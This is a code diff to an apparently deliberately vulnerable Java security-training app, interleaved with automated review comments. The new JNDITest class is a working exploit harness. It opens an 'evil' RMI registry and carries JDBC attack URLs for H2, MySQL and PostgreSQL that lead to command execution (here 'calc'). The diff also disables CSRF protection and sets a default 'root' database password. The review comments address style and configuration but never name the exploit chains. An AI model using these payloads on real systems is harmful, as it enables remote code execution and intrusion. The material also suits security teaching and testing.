diff --git a/pom.xml b/pom.xml
index 751a4b35..1c36a68c 100644
--- a/pom.xml
+++ b/pom.xml
@@ -306,6 +306,28 @@
5.8.10
+
+
+ org.postgresql
+ postgresql
+ 42.3.1
+
+
+ org.apache.commons
+ commons-dbcp2
+ 2.0
+
+
+ com.h2database
+ h2
+ 1.4.200
+
+
+ org.apache.tomcat
+ tomcat-dbcp
+ 9.0.40
+
+
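Review bot: The four dependencies added in this hunk carry no comment explaining why they are needed, and as far as this rendering shows no scope, so they join the runtime classpath of the whole web application rather than only the JNDI harness added in the same commit. Since `JNDITest` lives under `src/main/java`, `<scope>test</scope>` would break its compilation, so the practical fix is a comment above the group such as `<!-- pulled in only for org.joychou.util.JNDITest; pinned to old releases on purpose -->` so a later dependency audit treats the pins as deliberate rather than as an oversight. commons-dbcp2 2.0 and h2 1.4.200 in particular are old releases, which makes that documentation worth having.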
diff --git a/src/main/java/org/joychou/controller/Log4j.java b/src/main/java/org/joychou/controller/Log4j.java
index ada8a394..61ffd957 100644
--- a/src/main/java/org/joychou/controller/Log4j.java
+++ b/src/main/java/org/joychou/controller/Log4j.java
@@ -3,6 +3,7 @@
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.springframework.web.bind.annotation.GetMapping;
+import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;
@RestController
@@ -16,7 +17,7 @@ public class Log4j {
* Fix: Update log4j to lastet version.
* @param token token
*/
- @GetMapping("/log4j")
+ @RequestMapping("/log4j")
public String log4j(String token) {
if(token.equals("java-sec-code")) {
return "java sec code";
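Review bot: `token.equals("java-sec-code")` on the line after the changed annotation throws a NullPointerException when the request carries no `token` parameter, because an unannotated simple-type handler argument is bound as null when absent; switching from `@GetMapping` to `@RequestMapping` now surfaces that 500 on every HTTP method rather than GET alone. Use a null-safe comparison, `if ("java-sec-code".equals(token)) {`. If accepting all verbs is intentional, a one-line comment saying so would help; otherwise `@RequestMapping(value = "/log4j", method = {RequestMethod.GET, RequestMethod.POST})` (with the matching `RequestMethod` import) keeps the exposed surface explicit. The body of `log4j` continues past the hunk.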
diff --git a/src/main/java/org/joychou/util/JNDITest.java b/src/main/java/org/joychou/util/JNDITest.java
new file mode 100644
index 00000000..37f9e446
--- /dev/null
+++ b/src/main/java/org/joychou/util/JNDITest.java
@@ -0,0 +1,97 @@
+package org.joychou.util;
+
+
+import com.sun.jndi.rmi.registry.ReferenceWrapper;
+
+import javax.naming.Reference;
+import javax.naming.StringRefAddr;
+import java.rmi.registry.LocateRegistry;
+import java.rmi.registry.Registry;
+import java.sql.DriverManager;
+import java.sql.SQLException;
+import java.util.HashMap;
+
+
+public class JNDITest {
+ public static String tomcat_dbcp2_factory = "org.apache.tomcat.dbcp.dbcp2.BasicDataSourceFactory";
+ public static String tomcat_dbcp1_factory = "org.apache.tomcat.dbcp.dbcp.BasicDataSourceFactory";
+ public static String commons_dbcp2_factory = "org.apache.commons.dbcp2.BasicDataSourceFactory";
+ public static String commons_dbcp1_factory = "org.apache.commons.dbcp.BasicDataSourceFactory";
+
+ public static String H2_JDBC_URL = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ON\n" +
+ "INFORMATION_SCHEMA.TABLES AS $$//javascript\n" +
+ "java.lang.Runtime.getRuntime().exec('calc')\n" +
+ "$$\n";
+ // 需要伪造Mysql服务器的返回,利用工具:https://github.com/fnmsd/MySQL_Fake_Server
+ public static String MYSQL_JDBC_URL = "jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_cc6";
+
+
+ private static Reference buildRef(HashMap addrs, String factory, String JDBC_URL) {
+
+ Reference ref = new Reference("javax.sql.DataSource", factory, null);
+ ref.add(new StringRefAddr("url", JDBC_URL));
+ // 使用 Lambda 表达式遍历 HashMap
+ addrs.forEach((key, value) -> {
+ ref.add(new StringRefAddr(key, value));
+ });
+ return ref;
+ }
+
+ private static HashMap genH2ReferenceAddr() {
+ HashMap hashMap = new HashMap<>();
+ hashMap.put("driverClassName", "org.h2.Driver");
+ hashMap.put("username", "root");
+ hashMap.put("password", "password");
+ hashMap.put("initialSize", "1");
+ return hashMap;
+ }
+
+ private static HashMap genMysqlReferenceAddr() {
+ HashMap hashMap = new HashMap<>();
+ hashMap.put("driverClassName", "com.mysql.jdbc.Driver");
+ hashMap.put("initialSize", "1");
+ return hashMap;
+ }
+
+ public static void JNDIstart() throws Exception {
+ Registry registry = LocateRegistry.createRegistry(1099);
+ Reference reference = buildRef(genMysqlReferenceAddr(), tomcat_dbcp2_factory, MYSQL_JDBC_URL);
+ ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
+ registry.bind("Exploit", referenceWrapper);
+ System.out.println("Creating evil RMI registry on port 1099");
+ }
+
+
+ public static void postgresqlTest() throws SQLException {
+ /*
+ python启用ftp服务器python3 -m pyftpdlib -d .
+ ftp服务器上的test.xml内容:
+
+
+
+
+
+ calc
+
+
+
+
+ */
+ DriverManager.getConnection("jdbc:postgresql://localhost:5432/testdb?socketFactory=org.springframework.context.support.FileSystemXmlApplicationContext&socketFactoryArg=ftp://127.0.0.1:2121/test.xml");
+ }
+
+ /**
+ * 参考链接:
+ * https://tttang.com/archive/1405/
+ * https://tttang.com/archive/1462/
+ * @param args
+ * @throws Exception
+ */
+ public static void main(String[] args) throws Exception {
+ JNDIstart();
+
+ }
+}
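Review bot: The configuration strings declared right after the class header are `public static` but not `final`, so any code in the application can reassign the factory class names or JDBC URLs at runtime; `private static final` matches how they are actually used (read once by `JNDIstart` and `buildRef`), and the mixed naming (`tomcat_dbcp2_factory` next to `H2_JDBC_URL`, a parameter spelled `JDBC_URL`) should settle on one convention. The class has no Javadoc stating what it is: a standalone lab harness started from its own `main`, not wired to any controller. Because it sits under `src/main/java` it is packaged into the deployable web application together with the RMI registry it opens on port 1099, so a class-level comment such as `/** Standalone JNDI lab harness; run via main() only, never referenced by the web application. */`, or relocating it to `src/test`, would make that intent explicit for anyone auditing the build artifact.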
diff --git a/src/main/resources/application.properties b/src/main/resources/application.properties
index 96ca82c3..669dd468 100644
--- a/src/main/resources/application.properties
+++ b/src/main/resources/application.properties
@@ -1,7 +1,7 @@
spring.datasource.url=jdbc:mysql://localhost:3306/java_sec_code?AllowPublicKeyRetrieval=true&useSSL=false&serverTimezone=UTC
spring.datasource.username=root
-spring.datasource.password=woshishujukumima
+spring.datasource.password=root
spring.datasource.driver-class-name=com.mysql.cj.jdbc.Driver
mybatis.mapper-locations=classpath:mapper/*.xml
# mybatis SQL log
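Review bot: The new `spring.datasource.password=root` line keeps a database credential committed in the properties file, and the change to a well-known default weakens it further. Spring resolves placeholders here, so `spring.datasource.password=${DB_PASSWORD:root}` would let deployments supply the real secret through the environment while keeping the local default; a comment `# override DB_PASSWORD outside version control` above it would document the expectation. The same applies to `spring.datasource.username` two lines up.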
@@ -28,7 +28,7 @@ joychou.security.referer.uri = /jsonp/**
### csrf configuration begins ###
# csrf token check
-joychou.security.csrf.enabled = true
+joychou.security.csrf.enabled = false
# URI without CSRF check (only support ANT url format)
joychou.security.csrf.exclude.url = /xxe/**, /fastjson/**, /xstream/**, /ssrf/**
# method for CSRF check
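Review bot: Flipping `joychou.security.csrf.enabled` to `false` turns CSRF protection off for the entire application, while the `joychou.security.csrf.exclude.url` list on the following line already exists for exempting individual paths. If the goal is to exercise a specific endpoint without a token, adding that path to the exclude list is the narrower change; if a global disable is intended, a comment such as `# CSRF globally disabled for local testing; re-enable before deploying` next to the flag would record the decision. The reason for the change is not visible in this hunk, so the intent needs stating either way.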